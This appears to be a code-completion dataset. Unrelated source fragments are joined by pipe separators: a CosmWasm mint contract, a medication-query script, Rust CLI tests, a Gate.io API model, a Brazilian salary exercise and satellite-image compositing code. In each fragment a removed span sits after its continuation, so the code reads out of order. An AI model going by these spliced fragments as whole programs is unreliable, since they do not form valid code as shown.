collector,
collateral_oracle,
daodiseoswap_factory,
lock,
token_code_id,
protocol_fee_rate,
staking,
} => update_config(
deps,
info,
owner,
oracle,
collector,
collateral_oracle,
daodiseoswap_factory,
lock,
token_code_id,
protocol_fee_rate,
staking,
),
ExecuteMsg::UpdateAsset {
asset_token,
auction_discount,
min_collateral_ratio,
ipo_params,
} => {
let asset_addr = deps.api.addr_validate(asset_token.as_str())?;
update_asset(
deps,
info,
asset_addr,
auction_discount,
min_collateral_ratio,
ipo_params,
)
}
ExecuteMsg::RegisterAsset {
asset_token,
auction_discount,
min_collateral_ratio,
ipo_params,
} => {
let asset_addr = deps.api.addr_validate(asset_token.as_str())?;
register_asset(
deps,
info,
asset_addr,
auction_discount,
min_collateral_ratio,
ipo_params,
)
}
ExecuteMsg::RegisterMigration {
asset_token,
end_price,
} => {
let asset_addr = deps.api.addr_validate(asset_token.as_str())?;
register_migration(deps, info, asset_addr, end_price)
}
ExecuteMsg::TriggerIPO { asset_token } => {
let asset_addr = deps.api.addr_validate(asset_token.as_str())?;
trigger_ipo(deps, info, asset_addr)
}
ExecuteMsg::OpenPosition {
collateral,
asset_info,
collateral_ratio,
short_params,
} => {
// only native token can be deposited directly
if !collateral.is_native_token() {
return Err(StdError::generic_err("unauthorized"));
}
// Check the actual deposit happens
collateral.assert_sent_native_token_balance(&info)?;
open_position(
deps,
env,
info.sender,
collateral,
asset_info,
collateral_ratio,
short_params,
)
}
ExecuteMsg::Deposit {
position_idx,
collateral,
} => {
// only native token can be deposited directly
if !collateral.is_native_token() {
return Err(StdError::generic_err("unauthorized"));
}
// Check the actual deposit happens
collateral.assert_sent_native_token_balance(&info)?;
deposit(deps, info.sender, position_idx, collateral)
}
ExecuteMsg::Withdraw {
position_idx,
collateral,
} => withdraw(deps, env, info.sender, position_idx, collateral),
ExecuteMsg::Mint {
position_idx,
asset,
short_params,
} => mint(deps, env, info.sender, position_idx, asset, short_params),
}
}
pub fn receive_cw20(
deps: DepsMut,
env: Env,
info: MessageInfo,
cw20_msg: Cw20ReceiveMsg,
) -> StdResult<Response> {
let passed_asset: Asset = Asset {
info: AssetInfo::Token {
contract_addr: info.sender.to_string(),
},
amount: cw20_msg.amount,
};
match from_binary(&cw20_msg.msg) {
Ok(Cw20HookMsg::OpenPosition {
asset_info,
collateral_ratio,
short_params,
}) => {
let cw20_sender = deps.api.addr_validate(cw20_msg.sender.as_str())?;
open_position(
deps,
env,
cw20_sender,
passed_asset,
asset_info,
collateral_ratio,
short_params,
)
}
Ok(Cw20HookMsg::Deposit { position_idx }) => {
let cw20_sender = deps.api.addr_validate(cw20_msg.sender.as_str())?;
deposit(deps, cw20_sender, position_idx, passed_asset)
}
Ok(Cw20HookMsg::Burn { position_idx }) => {
let cw20_sender = deps.api.addr_validate(cw20_msg.sender.as_str())?;
burn(deps, env, cw20_sender, position_idx, passed_asset)
}
Ok(Cw20HookMsg::Auction { position_idx }) => {
let cw20_sender = deps.api.addr_validate(cw20_msg.sender.as_str())?;
auction(deps, env, cw20_sender, position_idx, passed_asset)
}
Err(_) => Err(StdError::generic_err("invalid cw20 hook message")),
}
}
#[allow(clippy::too_many_arguments)]
pub fn update_config(
deps: DepsMut,
info: MessageInfo,
owner: Option<String>,
oracle: Option<String>,
collector: Option<String>,
collateral_oracle: Option<String>,
daodiseoswap_factory: Option<String>,
lock: Option<String>,
token_code_id: Option<u64>,
protocol_fee_rate: Option<Decimal>,
staking: Option<String>,
) -> StdResult<Response> {
let mut config: Config = read_config(deps.storage)?;
if deps.api.addr_canonicalize(info.sender.as_str())? != config.owner {
return Err(StdError::generic_err("unauthorized"));
}
if let Some(owner) = owner {
config.owner = deps.api.addr_canonicalize(&owner)?;
}
if let Some(oracle) = oracle {
config.oracle = deps.api.addr_canonicalize(&oracle)?;
}
if let Some(collector) = collector {
config.collector = deps.api.addr_canonicalize(&collector)?;
}
if let Some(collateral_oracle) = collateral_oracle {
config.collateral_oracle = deps.api.addr_canonicalize(&collateral_oracle)?;
}
if let Some(daodiseoswap_factory) = daodiseoswap_factory {
config.daodiseoswap_factory = deps.api.addr_canonicalize(&daodiseoswap_factory)?;
}
if let Some(lock) = lock {
config.lock = deps.api.addr_canonicalize(&lock)?;
}
if let Some(token_code_id) = token_code_id {
config.token_code_id = token_code_id;
}
if let Some(protocol_fee_rate) = protocol_fee_rate {
assert_protocol_fee(protocol_fee_rate)?;
config.protocol_fee_rate = protocol_fee_rate;
}
if let Some(staking) = staking {
config.staking = deps.api.addr_canonicalize(&staking)?;
}
store_config(deps.storage, &config)?;
Ok(Response::new().add_attribute("action", "update_config"))
}
pub fn update_asset(
deps: DepsMut,
info: MessageInfo,
asset_token: Addr,
auction_discount: Option<Decimal>,
min_collateral_ratio: Option<Decimal>,
ipo_params: Option<IPOParams>,
) -> StdResult<Response> {
let config: Config = read_config(deps.storage)?;
let asset_token_raw = deps.api.addr_canonicalize(asset_token.as_str())?;
let mut asset: AssetConfig = read_asset_config(deps.storage, &asset_token_raw)?;
if deps.api.addr_canonicalize(info.sender.as_str())? != config.owner {
return Err(StdError::generic_err("unauthorized"));
}
if let Some(auction_discount) = auction_discount {
assert_auction_discount(auction_discount)?;
asset.auction_discount = auction_discount;
}
if let Some(min_collateral_ratio) = min_collateral_ratio {
assert_min_collateral_ratio(min_collateral_ratio)?;
asset.min_collateral_ratio = min_collateral_ratio;
}
|
store_asset_config(deps.storage, &asset_token_raw, &asset)?;
Ok(Response::new().add_attribute("action", "update_asset"))
}
pub fn register_asset(
deps: DepsMut,
info: MessageInfo,
asset_token: Addr,
auction_discount: Decimal,
min_collateral_ratio: Decimal,
ipo_params: Option<IPOParams>,
) -> StdResult<Response> {
assert_auction_discount(auction_discount)?;
assert_min_collateral_ratio(min_collateral_ratio)?;
let config: Config = read_config(deps.storage)?;
// permission check
if deps.api.addr_canonicalize(info.sender.as_str())? != config.owner {
return Err(StdError::generic_err("unauthorized"));
}
let asset_token_raw = deps.api.addr_canonicalize(asset_token.as_str())?;
if read_asset_config(deps.storage, &asset_token_raw).is_ok() {
return Err(StdError::generic_err("Asset was already registered"));
}
let mut messages: Vec<CosmosMsg> = vec![];
// check if it is a preIPO asset
if let Some(params) = ipo_params.clone() {
assert_min_collateral_ratio(params.min_collateral_ratio_after_ipo)?;
} else {
// only non-preIPO assets can be used as collateral
messages.push(CosmosMsg::Wasm(WasmMsg::Execute {
contract_addr: deps
.api
.addr_humanize(&config.collateral_oracle)?
.to_string(),
funds: vec![],
msg: to_binary(&CollateralOracleExecuteMsg::RegisterCollateralAsset {
asset: AssetInfo::Token {
contract_addr: asset_token.to_string(),
},
multiplier: Decimal::one(), // default collateral multiplier for new mAssets
price_source: SourceType::MirrorOracle {},
})?,
}));
}
// Store temp info into base asset store
store_asset_config(
deps.storage,
&asset_token_raw,
&AssetConfig {
token: deps.api.addr_canonicalize(asset_token.as_str())?,
auction_discount,
min_collateral_ratio,
end_price: None,
ipo_params,
},
)?;
Ok(Response::new()
.add_attributes(vec![
attr("action", "register"),
attr("asset_token", asset_token),
])
.add_messages(messages))
}
pub fn register_migration(
deps: DepsMut,
info: MessageInfo,
asset_token: Addr,
end_price: Decimal,
) -> StdResult<Response> {
let config = read_config(deps.storage)?;
if config.owner != deps.api.addr_canonicalize(info.sender.as_str())? {
return Err(StdError::generic_err("unauthorized"));
}
let asset_token_raw = deps.api.addr_canonicalize(asset_token.as_str())?;
let asset_config: AssetConfig = read_asset_config(deps.storage, &asset_token_raw)?;
// update asset config
store_asset_config(
deps.storage,
&asset_token_raw,
&AssetConfig {
end_price: Some(end_price),
min_collateral_ratio: Decimal::percent(100),
ipo_params: None,
..asset_config
},
)?;
// flag asset as revoked in the collateral oracle
Ok(Response::new()
.add_messages(vec![CosmosMsg::Wasm(WasmMsg::Execute {
contract_addr: deps
.api
.addr_humanize(&config.collateral_oracle)?
.to_string(),
funds: vec![],
msg: to_binary(&CollateralOracleExecuteMsg::RevokeCollateralAsset {
asset: AssetInfo::Token {
contract_addr: asset_token.to_string(),
},
})?,
})])
.add_attributes(vec![
attr("action", "migrate_asset"),
attr("asset_token", asset_token.as_str()),
attr("end_price", end_price.to_string()),
]))
}
pub fn trigger_ipo(deps: DepsMut, info: MessageInfo, asset_token: Addr) -> StdResult<Response> {
let config = read_config(deps.storage)?;
let asset_token_raw: CanonicalAddr = deps.api.addr_canonicalize(asset_token.as_str())?;
let oracle_feeder: Addr = load_oracle_feeder(
deps.as_ref(),
deps.api.addr_humanize(&config.oracle)?,
asset_token.clone(),
)?;
// only asset feeder can trigger ipo
if oracle_feeder != info.sender {
return Err(StdError::generic_err("unauthorized"));
}
let mut asset_config: AssetConfig = read_asset_config(deps.storage, &asset_token_raw)?;
let ipo_params: IPOParams = match asset_config.ipo_params {
Some(v) => v,
None => return Err(StdError::generic_err("Asset does not have IPO params")),
};
asset_config.min_collateral_ratio = ipo_params.min_collateral_ratio_after_ipo;
asset_config.ipo_params = None;
store_asset_config(deps.storage, &asset_token_raw, &asset_config)?;
// register asset in collateral oracle
Ok(Response::new()
.add_messages(vec![CosmosMsg::Wasm(WasmMsg::Execute {
contract_addr: deps
.api
.addr_humanize(&config.collateral_oracle)?
.to_string(),
funds: vec![],
msg: to_binary(&CollateralOracleExecuteMsg::RegisterCollateralAsset {
asset: AssetInfo::Token {
contract_addr: asset_token.to_string(),
},
multiplier: Decimal::one(), // default collateral multiplier for new mAssets
price_source: SourceType::MirrorOracle {},
})?,
})])
.add_attributes(vec![
attr("action", "trigger_ipo"),
attr("asset_token", asset_token.as_str()),
]))
}
#[cfg_attr(not(feature = "library"), entry_point)]
pub fn query(deps: Deps, _env: Env, msg: QueryMsg) -> StdResult<Binary> {
match msg {
QueryMsg::Config {} => to_binary(&query_config(deps)?),
QueryMsg::AssetConfig { asset_token } => to_binary(&query_asset_config(deps, asset_token)?),
QueryMsg::Position { position_idx } => to_binary(&query_position(deps, position_idx)?),
QueryMsg::Positions {
owner_addr,
asset_token,
start_after,
limit,
order_by,
} => to_binary(&query_positions(
deps,
owner_addr,
asset_token,
start_after,
limit,
order_by,
)?),
QueryMsg::NextPositionIdx {} => to_binary(&query_next_position_idx(deps)?),
}
}
pub fn query_config(deps: Deps) -> StdResult<ConfigResponse> {
let state = read_config(deps.storage)?;
let resp = ConfigResponse {
owner: deps.api.addr_humanize(&state.owner)?.to_string(),
oracle: deps.api.addr_humanize(&state.oracle)?.to_string(),
staking: deps.api.addr_humanize(&state.staking)?.to_string(),
collector: deps.api.addr_humanize(&state.collector)?.to_string(),
collateral_oracle: deps
.api
.addr_humanize(&state.collateral_oracle)?
.to_string(),
daodiseoswap_factory: deps
.api
.addr_humanize(&state.daodiseoswap_factory)?
.to_string(),
lock: deps.api.addr_humanize(&state.lock)?.to_string(),
base_denom: state.base_denom,
token_code_id: state.token_code_id,
protocol_fee_rate: state.protocol_fee_rate,
};
Ok(resp)
}
pub fn query_asset_config(deps: Deps, asset_token: String) -> StdResult<AssetConfigResponse> {
let asset_config: AssetConfig = read_asset_config(
deps.storage,
&deps.api.addr_canonicalize(asset_token.as_str())?,
)?;
let resp = AssetConfigResponse {
token: deps
.api
.addr_humanize(&asset_config.token)
.unwrap()
.to_string(),
auction_discount: asset_config.auction_discount,
min_collateral_ratio: asset_config.min_collateral_ratio,
end_price: asset_config.end_price,
ipo_params: asset_config.ipo_params,
};
Ok(resp)
}
#[cfg_attr(not(feature = "library"), entry_point)]
pub fn migrate(_deps: DepsMut, _env: Env, _msg: MigrateMsg) -> StdResult<Response> {
Ok(Response::default())
} | if let Some(ipo_params) = ipo_params {
assert_min_collateral_ratio(ipo_params.min_collateral_ratio_after_ipo)?;
asset.ipo_params = Some(ipo_params);
} |
common_medication_map.js | // Reference Number: PDC-055
// Query Title: Most commonly prescribed medication classes
function map(patient) {
var atcLevel = 2; // Level definition based on definition found on Wikipedia
var atcCutoff = getATCCodeLength(atcLevel);
var drugList = patient.medications();
var now = new Date(2013, 10, 30);
// Shifts date by year, month, and date specified
function addDate(date, y, m, d) {
var n = new Date(date);
n.setFullYear(date.getFullYear() + (y || 0));
n.setMonth(date.getMonth() + (m || 0));
n.setDate(date.getDate() + (d || 0));
return n;
}
// a and b are javascript Date objects
// Returns a with the 1.2x calculated date offset added in
function | (a, b) {
var start = new Date(a);
var end = new Date(b);
var diff = Math.floor((end - start) / (1000 * 3600 * 24));
var offset = Math.floor(1.2 * diff);
return addDate(start, 0, 0, offset);
}
function isCurrentDrug(drug) {
var drugStart = drug.indicateMedicationStart().getTime();
var drugEnd = drug.indicateMedicationStop().getTime();
return (endDateOffset(drugStart, drugEnd) >= now && drugStart <= now);
}
// Define ATC cutoff levels
function getATCCodeLength(val) {
switch (val) {
case 1:
return 1;
case 2:
return 3;
case 3:
return 4;
case 4:
return 5;
case 5:
return 7;
default:
return 0;
}
}
for (var i = 0; i < drugList.length; i++) {
if (isCurrentDrug(drugList[i])) {
// Get all represented codes for each drug
var codes = drugList[i].medicationInformation().codedProduct();
// Filter out only ATC codes
for (var j = 0; j < codes.length; j++) {
if (codes[j].codeSystemName().toLowerCase() !== null &&
codes[j].codeSystemName().toLowerCase() === "whoATC".toLowerCase()) {
// Truncate to appropriate level length
emit(codes[j].code().substring(0, atcCutoff), 1);
}
}
}
}
}
| endDateOffset |
samples.rs | extern crate assert_cli;
#[test]
fn sample1() {
assert_cli::Assert::main_binary()
.stdin(
"\
aa bb cc dd ee
",
)
.stdout()
.is("1")
.unwrap();
}
#[test]
fn sample2() {
assert_cli::Assert::main_binary()
.stdin(
"\
aa bb cc dd aa
", | }
#[test]
fn sample3() {
assert_cli::Assert::main_binary()
.stdin(
"\
aa bb cc dd aaa
",
)
.stdout()
.is("1")
.unwrap();
}
#[test]
fn sample4() {
assert_cli::Assert::main_binary()
.stdin(
"\
aa bb cc dd ee
aa bb cc dd aa
aa bb cc dd aaa
",
)
.stdout()
.is("2")
.unwrap();
}
#[test]
fn puzzle1() {
assert_cli::Assert::main_binary()
.stdin(include_str!("../data/puzzle1.in"))
.stdout()
.is("325")
.unwrap();
} | )
.stdout()
.is("0")
.unwrap(); |
margin_account_book.py | # coding: utf-8
"""
Gate API v4
Welcome to Gate.io API APIv4 provides spot, margin and futures trading operations. There are public APIs to retrieve the real-time market statistics, and private APIs which needs authentication to trade on user's behalf. # noqa: E501
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from gate_api.configuration import Configuration
class MarginAccountBook(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'id': 'str',
'time': 'str',
'time_ms': 'int',
'currency': 'str',
'currency_pair': 'str', | attribute_map = {
'id': 'id',
'time': 'time',
'time_ms': 'time_ms',
'currency': 'currency',
'currency_pair': 'currency_pair',
'change': 'change',
'balance': 'balance',
}
def __init__(
self,
id=None,
time=None,
time_ms=None,
currency=None,
currency_pair=None,
change=None,
balance=None,
local_vars_configuration=None,
): # noqa: E501
# type: (str, str, int, str, str, str, str, Configuration) -> None
"""MarginAccountBook - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._id = None
self._time = None
self._time_ms = None
self._currency = None
self._currency_pair = None
self._change = None
self._balance = None
self.discriminator = None
if id is not None:
self.id = id
if time is not None:
self.time = time
if time_ms is not None:
self.time_ms = time_ms
if currency is not None:
self.currency = currency
if currency_pair is not None:
self.currency_pair = currency_pair
if change is not None:
self.change = change
if balance is not None:
self.balance = balance
@property
def id(self):
"""Gets the id of this MarginAccountBook. # noqa: E501
Balance change record ID # noqa: E501
:return: The id of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this MarginAccountBook.
Balance change record ID # noqa: E501
:param id: The id of this MarginAccountBook. # noqa: E501
:type: str
"""
self._id = id
@property
def time(self):
"""Gets the time of this MarginAccountBook. # noqa: E501
Balance changed timestamp # noqa: E501
:return: The time of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._time
@time.setter
def time(self, time):
"""Sets the time of this MarginAccountBook.
Balance changed timestamp # noqa: E501
:param time: The time of this MarginAccountBook. # noqa: E501
:type: str
"""
self._time = time
@property
def time_ms(self):
"""Gets the time_ms of this MarginAccountBook. # noqa: E501
The timestamp of the change (in milliseconds) # noqa: E501
:return: The time_ms of this MarginAccountBook. # noqa: E501
:rtype: int
"""
return self._time_ms
@time_ms.setter
def time_ms(self, time_ms):
"""Sets the time_ms of this MarginAccountBook.
The timestamp of the change (in milliseconds) # noqa: E501
:param time_ms: The time_ms of this MarginAccountBook. # noqa: E501
:type: int
"""
self._time_ms = time_ms
@property
def currency(self):
"""Gets the currency of this MarginAccountBook. # noqa: E501
Currency changed # noqa: E501
:return: The currency of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._currency
@currency.setter
def currency(self, currency):
"""Sets the currency of this MarginAccountBook.
Currency changed # noqa: E501
:param currency: The currency of this MarginAccountBook. # noqa: E501
:type: str
"""
self._currency = currency
@property
def currency_pair(self):
"""Gets the currency_pair of this MarginAccountBook. # noqa: E501
Account currency pair # noqa: E501
:return: The currency_pair of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._currency_pair
@currency_pair.setter
def currency_pair(self, currency_pair):
"""Sets the currency_pair of this MarginAccountBook.
Account currency pair # noqa: E501
:param currency_pair: The currency_pair of this MarginAccountBook. # noqa: E501
:type: str
"""
self._currency_pair = currency_pair
@property
def change(self):
"""Gets the change of this MarginAccountBook. # noqa: E501
Amount changed. Positive value means transferring in, while negative out # noqa: E501
:return: The change of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._change
@change.setter
def change(self, change):
"""Sets the change of this MarginAccountBook.
Amount changed. Positive value means transferring in, while negative out # noqa: E501
:param change: The change of this MarginAccountBook. # noqa: E501
:type: str
"""
self._change = change
@property
def balance(self):
"""Gets the balance of this MarginAccountBook. # noqa: E501
Balance after change # noqa: E501
:return: The balance of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._balance
@balance.setter
def balance(self, balance):
"""Sets the balance of this MarginAccountBook.
Balance after change # noqa: E501
:param balance: The balance of this MarginAccountBook. # noqa: E501
:type: str
"""
self._balance = balance
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item,
value.items(),
)
)
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, MarginAccountBook):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, MarginAccountBook):
return True
return self.to_dict() != other.to_dict() | 'change': 'str',
'balance': 'str',
}
|
exercicio11.js | /*
Uma pessoa que trabalha de carteira assinada no Brasil tem descontados de seu salário bruto o INSS e o IR. Faça um programa que, dado um salário bruto, calcule o líquido a ser recebido.
A notação para um salário de R$1500,10, por exemplo, deve ser 1500.10. Para as faixas de impostos, use as seguintes referências:
INSS (Instituto Nacional do Seguro Social)
Salário bruto até R$ 1.556,94: alíquota de 8%
Salário bruto de R$ 1.556,95 a R$ 2.594,92: alíquota de 9%
Salário bruto de R$ 2.594,93 a R$ 5.189,82: alíquota de 11%
Salário bruto acima de R$ 5.189,82: alíquota máxima de R$ 570,88
IR (Imposto de Renda)
Até R$ 1.903,98: isento de imposto de renda
De R$ 1.903,99 a 2.826,65: alíquota de 7,5% e parcela de R$ 142,80 a deduzir do imposto
De R$ 2.826,66 a R$ 3.751,05: alíquota de 15% e parcela de R$ 354,80 a deduzir do imposto
De R$ 3.751,06 a R$ 4.664,68: alíquota de 22,5% e parcela de R$ 636,13 a deduzir do imposto
Acima de R$ 4.664,68: alíquota de 27,5% e parcela de R$ 869,36 a deduzir do imposto.
Exemplo : Uma pessoa possui o salário bruto de R$ 3.000,00. O cálculo será:
O salário bruto está entre R$ 2.594,93 e R$ 5.189,82, então sua alíquota para INSS é de 11%. O INSS será 11% de R$ 3.000, ou seja, R$ 330,00.
Para descobrir o salário-base, subtraia do salário bruto a alíquota do INSS: R$ 3.000,00 - R$ 330,00 = R$ 2.670,00.
Para pegar o valor do IR, temos um salário (já deduzido o INSS) entre R$ 1.903,99 e 2.826,65, sendo a alíquota, então, de 7.5%, com parcela de R$ 142,80 a deduzir do imposto. Assim, temos:
R$ 2.670,00: salário com INSS já deduzido;
7.5%: alíquota de imposto de renda;
R$ 142,80 parcela a se deduzir do imposto.
Fazendo a conta, temos: (7,5% de R$ 2.670,00) - R$ 142,80 = R$ 57,45
O último cálculo para conseguir o salário líquido é R$ 2.670,00 - R$ 57,45 (salário-base - valor IR) = R$ 2.612,55.
Resultado: R$ 2.612,55.
Dica: que tal identificar as alíquotas com variáveis de nomes explicativos?
*/
let aliquotaINSS;
let aliquotaIR;
let salarioBruto = 2000.00;
if (salarioBruto <= 1556.94) {
aliquotaINSS = salarioBruto * 0.08;
} else if (salarioBruto <= 2594.92) {
aliquotaINSS = salarioBruto * 0.09;
} else if (salarioBruto <= 5189.82) {
aliquotaINSS = salarioBruto * 0.11;
} else {
aliquotaINSS = 570.88;
}
let salarioBase = salarioBruto - aliquotaINSS;
if (salarioBase <= 1903.98) {
aliquotaIR = 0;
} else if (salarioBase <= 2826.65) {
aliquotaIR = (salarioBase * 0.075) - 142.80; | aliquotaIR = (salarioBase * 0.225) - 636.13;
} else {
aliquotaIR = (salarioBase * 0.275) - 869.36;
}
let salarioLiquido = salarioBase - aliquotaIR;
console.log (salarioLiquido); | } else if (salarioBase <= 3751.05) {
aliquotaIR = (salarioBase * 0.15) - 354.80;
} else if (salarioBase <= 4664.68) { |
radiometric_normalization.py | """
Module for radiometric normalization
Credits:
Copyright (c) 2018-2019 Johannes Schmid (GeoVille)
Copyright (c) 2017-2019 Matej Aleksandrov, Matic Lubej, Devis Peresutti (Sinergise)
This source code is licensed under the MIT license found in the LICENSE
file in the root directory of this source tree.
"""
import numpy as np
from eolearn.core import EOTask, FeatureType
class ReferenceScenes(EOTask):
""" Creates a layer of reference scenes which have the highest fraction of valid pixels.
The number of reference scenes is limited to a definable number.
Contributor: Johannes Schmid, GeoVille Information Systems GmbH, 2018
:param feature: Name of the eopatch data layer. Needs to be of the FeatureType "DATA".
:type feature: (FeatureType, str) or (FeatureType, str, str)
:param valid_fraction_feature: Name of the layer containing the valid fraction obtained with the EOTask
'AddValidDataFraction'. Needs to be of the FeatureType "SCALAR".
:type valid_fraction_feature: (FeatureType, str)
:param max_scene_number: Maximum number of reference scenes taken for the creation of the composite. By default,
the maximum number of scenes equals the number of time frames
:type max_scene_number: int
"""
def __init__(self, feature, valid_fraction_feature, max_scene_number=None):
self.feature = self._parse_features(feature, new_names=True,
default_feature_type=FeatureType.DATA,
rename_function='{}_REFERENCE'.format)
self.valid_fraction_feature = self._parse_features(valid_fraction_feature,
default_feature_type=FeatureType.SCALAR)
self.number = max_scene_number
def execute(self, eopatch):
feature_type, feature_name, new_feature_name = next(self.feature(eopatch))
valid_fraction_feature_type, valid_fraction_feature_name = next(self.valid_fraction_feature(eopatch))
valid_frac = list(eopatch[valid_fraction_feature_type][valid_fraction_feature_name].flatten())
data = eopatch[feature_type][feature_name]
number = data.shape[0] if self.number is None else self.number
eopatch[feature_type][new_feature_name] = np.array([data[x] for _, x in
sorted(zip(valid_frac, range(data.shape[0])), reverse=True)
if x <= number-1])
return eopatch
class BaseCompositing(EOTask):
""" Base class to create a composite of reference scenes
Contributor: Johannes Schmid, GeoVille Information Systems GmbH, 2018
:param feature: Feature holding the input time-series. Default type is FeatureType.DATA
:type feature: (FeatureType, str)
:param feature_composite: Type and name of output composite image. Default type is FeatureType.DATA_TIMELESS
:type feature_composite: (FeatureType, str)
:param percentile: Percentile along the time dimension used for compositing. Methods use different percentiles
:type percentile: int or list
:param max_index: Value used to flag indices with NaNs. Could be integer or NaN. Default is 255
:type max_index: int or NaN
:param interpolation: Method used to compute percentile. Allowed values are {'geoville', 'linear', 'lower',
'higher', 'midpoint', 'nearest'}. 'geoville' interpolation performs a custom
implementation, while the other methods use the numpy `percentile` function. Default is
'lower'
:type interpolation: str
:param no_data_value: Value in the composite assigned to non valid data points. Default is NaN
:type no_data_value: float or NaN
"""
def __init__(self, feature, feature_composite, percentile=None, max_index=255, interpolation='lower',
no_data_value=np.nan):
self.feature = self._parse_features(feature,
default_feature_type=FeatureType.DATA,
rename_function='{}_COMPOSITE'.format)
self.composite_type, self.composite_name = next(
self._parse_features(feature_composite, default_feature_type=FeatureType.DATA_TIMELESS)())
self.percentile = percentile
self.max_index = max_index
self.interpolation = interpolation
self._index_by_percentile = self._geoville_index_by_percentile \
if self.interpolation.lower() == 'geoville' else self._numpy_index_by_percentile
self.no_data_value = no_data_value
def _numpy_index_by_percentile(self, data, percentile):
""" Calculate percentile of numpy stack and return the index of the chosen pixel.
numpy percentile function is used with one of the following interpolations {'linear', 'lower', 'higher',
'midpoint', 'nearest'}
"""
data_perc_low = np.nanpercentile(data, percentile, axis=0, interpolation=self.interpolation)
indices = np.empty(data_perc_low.shape, dtype=np.uint8)
indices[:] = np.nan
abs_diff = np.where(np.isnan(data_perc_low), np.inf, abs(data - data_perc_low))
indices = np.where(np.isnan(data_perc_low), self.max_index, np.nanargmin(abs_diff, axis=0))
return indices
def _geoville_index_by_percentile(self, data, percentile):
""" Calculate percentile of numpy stack and return the index of the chosen pixel. """
# no_obs = bn.allnan(arr_tmp["data"], axis=0)
data_tmp = np.array(data, copy=True)
valid_obs = np.sum(np.isfinite(data_tmp), axis=0)
# replace NaN with maximum
max_val = np.nanmax(data_tmp) + 1
data_tmp[np.isnan(data_tmp)] = max_val
# sort - former NaNs will move to the end
ind_tmp = np.argsort(data_tmp, kind="mergesort", axis=0)
# desired position as well as floor and ceiling of it
k_arr = (valid_obs - 1) * (percentile / 100.0)
k_arr = np.where(k_arr < 0, 0, k_arr)
f_arr = np.floor(k_arr + 0.5)
f_arr = f_arr.astype(int)
# get floor value of reference band and index band
ind = f_arr.astype("int16")
y_val, x_val = ind_tmp.shape[1], ind_tmp.shape[2]
y_val, x_val = np.ogrid[0:y_val, 0:x_val]
idx = np.where(valid_obs == 0, self.max_index, ind_tmp[ind, y_val, x_val])
return idx
def _get_reference_band(self, data):
""" Extract reference band from input 4D data according to compositing method
:param data: 4D array from which to extract reference band (e.g. blue, maxNDVI, ..)
:type data: numpy array
:return: 3D array containing reference band according to compositing method
"""
raise NotImplementedError
def _get_indices(self, data):
""" Compute indices along temporal dimension corresponding to the sought percentile
:param data: Input 3D array holding the reference band
:type data: numpy array
:return: 2D array holding the temporal index corresponding to percentile
"""
indices = self._index_by_percentile(data, self.percentile)
return indices
def execute(self, eopatch):
""" Compute composite array merging temporal frames according to the compositing method
:param eopatch: eopatch holding time-series
:return: eopatch with composite image of time-series
"""
feature_type, feature_name = next(self.feature(eopatch))
data = eopatch[feature_type][feature_name].copy()
# compute band according to compositing method (e.g. blue, maxNDVI, maxNDWI)
reference_bands = self._get_reference_band(data)
# find temporal indices corresponding to pre-defined percentile
indices = self._get_indices(reference_bands)
# compute composite image selecting values along temporal dimension corresponding to percentile indices
composite_image = np.empty((data.shape[1:]), np.float32)
composite_image[:] = self.no_data_value
for scene_id, scene in enumerate(data):
composite_image = np.where(np.dstack([indices]) == scene_id, scene, composite_image)
eopatch[self.composite_type][self.composite_name] = composite_image
return eopatch
class BlueCompositing(BaseCompositing):
""" Blue band compositing method
- blue (25th percentile of the blue band)
:param blue_idx: Index of blue band in `feature` array
:type blue_idx: int
"""
def __init__(self, feature, feature_composite, blue_idx, interpolation='lower'):
super().__init__(feature, feature_composite, percentile=25, interpolation=interpolation)
self.blue_idx = blue_idx
if not isinstance(blue_idx, int):
raise ValueError('Incorrect value of blue band index specified')
def _get_reference_band(self, data):
""" Extract the blue band from time-series
:param data: 4D array from which to extract the blue reference band
:type data: numpy array
:return: 3D array containing the blue reference band
"""
return data[..., self.blue_idx].astype("float32")
class HOTCompositing(BaseCompositing):
""" HOT compositing method
- HOT (Index using bands blue and red)
The HOT index is defined as per
Zhu, Z., & Woodcock, C. E. (2012). "Object-based cloud and cloud shadow detection in Landsat imagery."
Remote Sensing of Environment, 118, 83-94.
:param blue_idx: Index of blue band in `feature` array
:type blue_idx: int
:param red_idx: Index of red band in `feature` array
:type red_idx: int
"""
def | (self, feature, feature_composite, blue_idx, red_idx, interpolation='lower'):
super().__init__(feature, feature_composite, percentile=25, interpolation=interpolation)
self.blue_idx = blue_idx
self.red_idx = red_idx
if not isinstance(blue_idx, int) or not isinstance(red_idx, int):
raise ValueError('Incorrect values of blue and red band indices specified')
def _get_reference_band(self, data):
""" Extract the HOT band from time-series
:param data: 4D array from which to extract the HOT reference band
:type data: numpy array
:return: 3D array containing the HOT reference band
"""
return data[..., self.blue_idx] - 0.5 * data[..., self.red_idx] - 0.08
class MaxNDVICompositing(BaseCompositing):
""" maxNDVI compositing method
- maxNDVI (temporal maximum of NDVI)
:param red_idx: Index of red band in `feature` array
:type red_idx: int
